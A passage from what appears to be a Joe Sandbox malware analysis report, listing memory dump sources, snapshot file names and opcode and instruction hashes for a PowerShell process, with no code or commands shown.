                                    • Instruction Fuzzy Hash: DD01843115CB084FD744EF0CE451AA5B3E0FB89364F10056EE58AC3661DA22E882CB41
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1458599476.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cfc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b9c4354b1a19c8fbb3e95a0d5d97f315834aea266f7c795db962395bc61a0d80
                                    • Instruction ID: a4831ec1b0bcb10c6a11809c0712006126b5d743dce7e0ef90e7837dc59a1b96
                                    • Opcode Fuzzy Hash: b9c4354b1a19c8fbb3e95a0d5d97f315834aea266f7c795db962395bc61a0d80
                                    • Instruction Fuzzy Hash: 88F0BE32B69D5E0AA7ED920C10143B991D2EBC8261B98827AC42DC33A9CD29DC430384
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1457802485.00007FFE7CEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CEF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cef0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9b53bcedc6c64e7823cc68e146fa3a51aa72f93a0619d7205ce7b8acfb22cb75
                                    • Instruction ID: 452e4fd1888f9a67e441f3c1a06cd851ec7e0fff5e07863e790235c7c86dda26
                                    • Opcode Fuzzy Hash: 9b53bcedc6c64e7823cc68e146fa3a51aa72f93a0619d7205ce7b8acfb22cb75
                                    • Instruction Fuzzy Hash: E4F0B43276CA088FDB9CAA0CE8419B973D1EB99320B10007EE48BC3296DD27E843C641
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1457802485.00007FFE7CEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CEF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cef0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b0280a36725fac4283faea80ee608c9832a287bd45f42d0c14a392327859191
                                    • Instruction ID: 6d44ea759c7773bd800a1d197c9c38202fbf5306c1a56125de8fd28a837e1f95
                                    • Opcode Fuzzy Hash: 2b0280a36725fac4283faea80ee608c9832a287bd45f42d0c14a392327859191
                                    • Instruction Fuzzy Hash: 43F0A03275C6044FDB08AA4CF8439B4B3D0E795320B10006EE98BC3653EC27F4938686
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1458599476.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cfc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d9212ddfb7075e2425201d79b0bb9bfa0c2530b229dbfd4a7e41294bd8270a2f
                                    • Instruction ID: abf9f527dc4f002e0e0586aa101385f8ad3610e22725199aff86b84abc18f51e
                                    • Opcode Fuzzy Hash: d9212ddfb7075e2425201d79b0bb9bfa0c2530b229dbfd4a7e41294bd8270a2f
                                    • Instruction Fuzzy Hash: 45F0A032A4E6884FEB15EB6CA8551ECFBA0FF59360F1801BFC15CD25A3DB2964458351
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1458599476.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cfc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f033e8e475f437f32077faf828315b27db822d2c5cb31790bab253cb3c8490f
                                    • Instruction ID: 344b3195db7bca3df8d5dc562ad37a9987b55ef92eefd8deb649d520aae879d7
                                    • Opcode Fuzzy Hash: 9f033e8e475f437f32077faf828315b27db822d2c5cb31790bab253cb3c8490f
                                    • Instruction Fuzzy Hash: B3D05B31BA4D4F4EE3D9A72C000827550D2DFCC7017648079441DC3365DD39DC438300